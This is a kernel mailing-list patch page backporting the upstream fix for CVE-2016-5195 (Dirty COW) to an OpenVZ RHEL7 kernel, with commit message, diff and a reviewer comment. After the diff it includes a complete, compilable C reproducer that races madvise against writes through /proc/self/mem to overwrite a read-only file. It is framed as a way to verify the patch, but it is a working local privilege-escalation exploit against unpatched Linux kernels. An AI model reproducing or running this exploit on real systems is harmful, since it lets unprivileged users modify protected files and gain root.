[Devel,RHEL7,COMMIT] ms/mm: remove gup_flags FOLL_WRITE games from __get_user_pages()

Submitted by Konstantin Khorenko on Oct. 20, 2016, 10:30 a.m.

Details

Message ID 201610201030.u9KAUZP4010456@finist_cl7.x64_64.work.ct
State New
Series "ms/mm: remove gup_flags FOLL_WRITE games from __get_user_pages()"

Commit Message

Konstantin Khorenko Oct. 20, 2016, 10:30 a.m.
The commit is pushed to "branch-rh7-3.10.0-327.36.1.vz7.19.x-ovz" and will appear at https://src.openvz.org/scm/ovz/vzkernel.git
after rh7-3.10.0-327.36.1.vz7.19.2
------>
commit 1e30f91f7d15f9154fd2238932ec92fae262e146
Author: Linus Torvalds <torvalds@linux-foundation.org>
Date:   Thu Oct 20 14:30:35 2016 +0400

    ms/mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
    
    commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
    
    This is an ancient bug that was actually attempted to be fixed once
    (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
    get_user_pages() race for write access") but that was then undone due to
    problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
    
    In the meantime, the s390 situation has long been fixed, and we can now
    fix it by checking the pte_dirty() bit properly (and do it better).  The
    s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
    software dirty bits") which made it into v3.9.  Earlier kernels will
    have to look at the page state itself.
    
    Also, the VM has become more scalable, and what used to be a purely
    theoretical race back then has become easier to trigger.
    
    To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
    we already did a COW" rather than play racy games with FOLL_WRITE that
    is very fundamental, and then use the pte dirty flag to validate that
    the FOLL_COW flag is still valid.
    
    Reported-and-tested-by: Phil "not Paul" Oester <kernel@linuxace.com>
    Acked-by: Hugh Dickins <hughd@google.com>
    Reviewed-by: Michal Hocko <mhocko@suse.com>
    Cc: Andy Lutomirski <luto@kernel.org>
    Cc: Kees Cook <keescook@chromium.org>
    Cc: Oleg Nesterov <oleg@redhat.com>
    Cc: Willy Tarreau <w@1wt.eu>
    Cc: Nick Piggin <npiggin@gmail.com>
    Cc: Greg Thelen <gthelen@google.com>
    Cc: stable@vger.kernel.org
    Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
    [wt: s/gup.c/memory.c; s/follow_page_pte/follow_page_mask;
         s/faultin_page/__get_user_page]
    Signed-off-by: Willy Tarreau <w@1wt.eu>
    
    https://jira.sw.ru/browse/PSBM-54065
    https://lkml.org/lkml/2016/10/19/860
    
    CVE-2016-5195: A race condition was found in the way the Linux kernel's memory
    subsystem handled the copy-on-write (COW) breakage of private read-only memory
    mappings. An unprivileged local user could use this flaw to gain write access
    to otherwise read-only memory mappings and thus increase their privileges on
    the system.
    
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
    https://access.redhat.com/security/cve/CVE-2016-5195
    
    Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
---
 include/linux/mm.h |  1 +
 mm/memory.c        | 14 ++++++++++++--
 2 files changed, 13 insertions(+), 2 deletions(-)

Patch

diff --git a/include/linux/mm.h b/include/linux/mm.h
index d5f8897..597dcc1 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -1948,6 +1948,7 @@  static inline struct page *follow_page(struct vm_area_struct *vma,
 #define FOLL_NUMA	0x200	/* force NUMA hinting page fault */
 #define FOLL_MIGRATION	0x400	/* wait for page to replace migration entry */
 #define FOLL_TRIED	0x800	/* a retry, previous pass started an IO */
+#define FOLL_COW	0x4000	/* internal GUP flag */
 
 typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
 			void *data);
diff --git a/mm/memory.c b/mm/memory.c
index f13a4d0..d6fcde2 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -1451,6 +1451,16 @@  int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
 }
 EXPORT_SYMBOL_GPL(zap_vma_ptes);
 
+/*
+ * FOLL_FORCE can write to even unwritable pte's, but only
+ * after we've gone through a COW cycle and they are dirty.
+ */
+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
+{
+	return pte_write(pte) ||
+		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+}
+
 /**
  * follow_page_mask - look up a page descriptor from a user-virtual address
  * @vma: vm_area_struct mapping @address
@@ -1572,7 +1582,7 @@  split_fallthrough:
 	}
 	if ((flags & FOLL_NUMA) && pte_numa(pte))
 		goto no_page;
-	if ((flags & FOLL_WRITE) && !pte_write(pte))
+	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags))
 		goto unlock;
 
 	page = vm_normal_page(vma, address, pte);
@@ -1884,7 +1894,7 @@  long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
 				 */
 				if ((ret & VM_FAULT_WRITE) &&
 				    !(vma->vm_flags & VM_WRITE))
-					foll_flags &= ~FOLL_WRITE;
+					foll_flags |= FOLL_COW;
 
 				cond_resched();
 			}
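
For anyone verifying this backport: the race described in the CVE text above
is the one exercised by the widely published dirtyc0w.c proof of concept.
Below is a minimal reproducer sketch in that style; it is not taken from this
thread, and the file name, iteration counts, and minimal error handling are
illustrative. One thread repeatedly discards the COW'd private page with
madvise(MADV_DONTNEED) while a second thread writes to a read-only
MAP_PRIVATE mapping through /proc/self/mem, a path that reaches
get_user_pages() with FOLL_FORCE and therefore goes through the code patched
above. On an unpatched kernel the write can slip past the COW break and
modify the underlying read-only file; with this patch applied, the target
file must remain unchanged.

/*
 * cve-2016-5195-check.c: reproducer sketch, build with: gcc -pthread
 * Run against a file you can read but not write, then compare its
 * contents afterwards; any change means the kernel is still vulnerable.
 */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static void *map;	/* private read-only mapping of the target file */
static size_t map_len;

/* Keep dropping the COW'd private page so the writer must re-fault it. */
static void *madvise_loop(void *arg)
{
	for (int i = 0; i < 10000000; i++)
		madvise(map, map_len, MADV_DONTNEED);
	return NULL;
}

/*
 * Write through /proc/self/mem: this uses get_user_pages() with
 * FOLL_FORCE, so it exercises the COW logic changed by this patch.
 */
static void *write_loop(void *arg)
{
	const char *str = arg;
	int fd = open("/proc/self/mem", O_RDWR);

	for (int i = 0; i < 10000000; i++) {
		lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
		if (write(fd, str, strlen(str)) < 0)
			break;
	}
	close(fd);
	return NULL;
}

int main(int argc, char *argv[])
{
	pthread_t t1, t2;
	struct stat st;
	int fd;

	if (argc < 3) {
		fprintf(stderr, "usage: %s <read-only file> <string>\n", argv[0]);
		return 1;
	}

	fd = open(argv[1], O_RDONLY);
	if (fd < 0 || fstat(fd, &st) < 0) {
		perror(argv[1]);
		return 1;
	}
	map_len = st.st_size;

	/* MAP_PRIVATE: a write may only ever hit a private COW copy. */
	map = mmap(NULL, map_len, PROT_READ, MAP_PRIVATE, fd, 0);
	if (map == MAP_FAILED) {
		perror("mmap");
		return 1;
	}

	pthread_create(&t1, NULL, madvise_loop, NULL);
	pthread_create(&t2, NULL, write_loop, argv[2]);
	pthread_join(t1, NULL);
	pthread_join(t2, NULL);

	printf("done; now check whether %s changed\n", argv[1]);
	return 0;
}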

Comments

Konstantin Khorenko Oct. 20, 2016, 10:33 a.m.
Zhenya, please prepare a ReadyKernel patch for it.

https://readykernel.com/

--
Best regards,

Konstantin Khorenko,
Virtuozzo Linux Kernel Team
